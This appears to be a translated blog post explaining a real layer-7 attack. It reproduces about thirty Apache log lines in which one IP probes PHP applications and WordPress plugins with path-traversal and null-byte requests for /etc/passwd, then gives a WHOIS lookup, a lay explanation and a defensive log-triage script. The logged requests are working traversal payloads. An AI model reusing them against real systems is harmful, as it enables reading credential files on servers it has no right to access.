A fine example of an L7 cyberattack
28/01/2014
What does a cyberattack look like in reality (and not like in the movies where a pretty skull appears on a computer screen)?
Well, like this:
107.23.240.63 - - [27/Jan/2014:23:17:28 +0100] "GET /private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 492 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:28 +0100] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 554 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:28 +0100] "GET /I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 550 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /index.php?page=../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /gwebmail/?module=../../../../etc/passwd%00 HTTP/1.0" 404 490 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /?module=../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /spywall/languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0" 404 505 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /languageTest.php?&language=../../../../../../../../etc/passwd%00 HTTP/1.0" 404 497 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /spywall/releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0" 404 505 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:30 +0100] "GET /releasenotes.php?relfile=../../../../../etc/passwd%00 HTTP/1.0" 404 497 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:30 +0100] "GET /asaancart%20v-0.9/libs/smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0" 404 523 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:31 +0100] "GET /smarty_ajax/index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0" 404 502 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:31 +0100] "GET /index.php?_=&f=update_intro&page=../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:31 +0100] "GET /acp/index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0" 404 494 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:31 +0100] "GET /index.php?p=../../../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:32 +0100] "GET /frontend/js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 496 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:32 +0100] "GET /js.php?module=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 487 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:32 +0100] "GET /index.php?xajax=SelTheme&xajaxargs[]=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:32 +0100] "GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0" 200 1848 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:34 +0100] "GET /sessions.php?globalIncludeFilePath=../../../../../../etc/passwd%0000 HTTP/1.0" 404 493 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:34 +0100] "GET /idoit/controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0" 404 501 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:34 +0100] "GET /controller.php?load=&lang=../../../../../../etc/passwd%00 HTTP/1.0" 404 495 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /jcow/index.php?p=../../../../../../etc/passwd%00 HTTP/1.0" 404 495 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /index.php?p=../../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /vanilla/index.php?p=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 498 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 531 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /wp-content/plugins/old-post-spinner/logview.php?ops_file=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 528 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:35 +0100] "GET /modules/maticmarket/deco/blanc/haut.php?modulename=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 520 "-" "-"
The real traces of a cyberattack...
Pretty, isn't it?
The very small font is deliberate: it gives an overview. Non-IT readers would not see any more at a larger size, and the others will know how to get a more readable rendering.
The attack (85 attempts in 24 seconds, at 23:17 last night) tries to exploit security flaws in order to retrieve the file containing the server's passwords. They are stored in encrypted form, but once retrieved the file could be subjected at leisure to intensive decoding, and so provide convenient access to the server targeted by the attack.
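As an added illustration (not part of the original post), here is a small Python triage script run over a constructed subset of the log lines above: it parses the Apache log format, URL-decodes the request target, flags traversal attempts (a decoded `../` step or an embedded NUL byte) and summarizes them per source IP. The second address, 198.51.100.7, and its benign request are constructed for contrast.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Constructed sample: three of the access-log lines above plus one benign request.
SAMPLE_LOG = """\
107.23.240.63 - - [27/Jan/2014:23:17:28 +0100] "GET /private.php?name=../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 492 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:29 +0100] "GET /index.php?page=../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 1848 "-" "-"
107.23.240.63 - - [27/Jan/2014:23:17:32 +0100] "GET /index.php?option=com_rsappt_pro2&view=../../../../../../etc/passwd%0000 HTTP/1.0" 200 1848 "-" "-"
198.51.100.7 - - [27/Jan/2014:23:18:02 +0100] "GET /index.php?page=about HTTP/1.1" 200 1848 "-" "Mozilla/5.0"
"""
# Apache common/combined log format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# Traversal indicators once URL-decoded: a "../" step or an embedded NUL byte.
TRAVERSAL_RE = re.compile(r'\.\./|\x00')


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    rec["size"] = int(rec["size"]) if rec["size"].isdigit() else 0
    # Decode so that %2e%2e%2f and %00 are seen the way the application sees them.
    rec["decoded"] = unquote(rec["target"])
    rec["traversal"] = TRAVERSAL_RE.search(rec["decoded"]) is not None
    return rec


def summarize(log_text):
    """Per source IP: traversal attempts, time span, and the sizes of any 200 responses."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["traversal"]:
            per_ip[rec["ip"]].append(rec)
    report = {}
    for ip, recs in per_ip.items():
        times = [r["ts"] for r in recs]
        ok = [r for r in recs if r["status"] == 200]
        report[ip] = {
            "attempts": len(recs),
            "span_seconds": int((max(times) - min(times)).total_seconds()),
            "hits_200": len(ok),
            "distinct_200_sizes": len({r["size"] for r in ok}),
        }
    return report
```

A single distinct size across all the 200 responses (1848 bytes here, the same as the ordinary index page) is a hint that the application ignored the parameter rather than served the file; treat it as a triage hint, not proof.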
The attacker is identified by 107.23.240.63, its IP address. A fuller description of it is easily obtained:
CIDR: 107.20.0.0/14
OriginAS:
NetName: AMAZON-EC2-8
NetHandle: NET-107-20-0-0-1
Parent: NET-107-0-0-0-0
NetType: Direct Assignment
Comment: The activity you have detected originates from a dynamic hosting environment.
Comment: For fastest response, please submit abuse reports at http://aws-portal.amazon.com/gp/aws/html-forms-controller/contactus/AWSAbuse
Comment: For more information regarding EC2 see:
Comment: http://ec2.amazonaws.com/
Comment: All reports MUST include:
Comment: * src IP
Comment: * dest IP (your IP)
Comment: * dest port
Comment: * Accurate date/timestamp and timezone of activity
Comment: * Intensity/frequency (short log extracts)
Comment: * Your contact details (phone and email) Without these we will be unable to identify the correct owner of the IP address at that point in time.
RegDate: 2011-05-03
Updated: 2012-03-02
Ref: http://whois.arin.net/rest/net/NET-107-20-0-0-1
OrgName: Amazon.com, Inc.
OrgId: AMAZO-4
Address: Amazon Web Services, Elastic Compute Cloud, EC2
Address: 1200 12th Avenue South
City: Seattle
StateProv: WA
PostalCode: 98144
Country: US
RegDate: 2005-09-29
Updated: 2009-06-02
Comment: For details of this service please see
Comment: http://ec2.amazonaws.com/
Ref: http://whois.arin.net/rest/org/AMAZO-4
The attack is therefore carried out from a virtual server offered for rent to anyone on the "Cloud" by an American company based in Seattle. The description even gives the procedure for reporting abuse, provided you reveal the details of your identity, of course!
The attack, no doubt run in parallel against thousands of other machines, certainly succeeded somewhere and gave the cyber-pirates a new server from which to launch further attacks, for instance. This is a very common activity nowadays, practised easily and with complete impunity.
And the "L7"?
"L7" here means "layer 7" and refers to the highest layer of the ISO 7498 (OSI) model. This abstract model is a classification that is otherwise completely useless, but in this case a "layer 7 cyberattack" immediately sounds much more serious.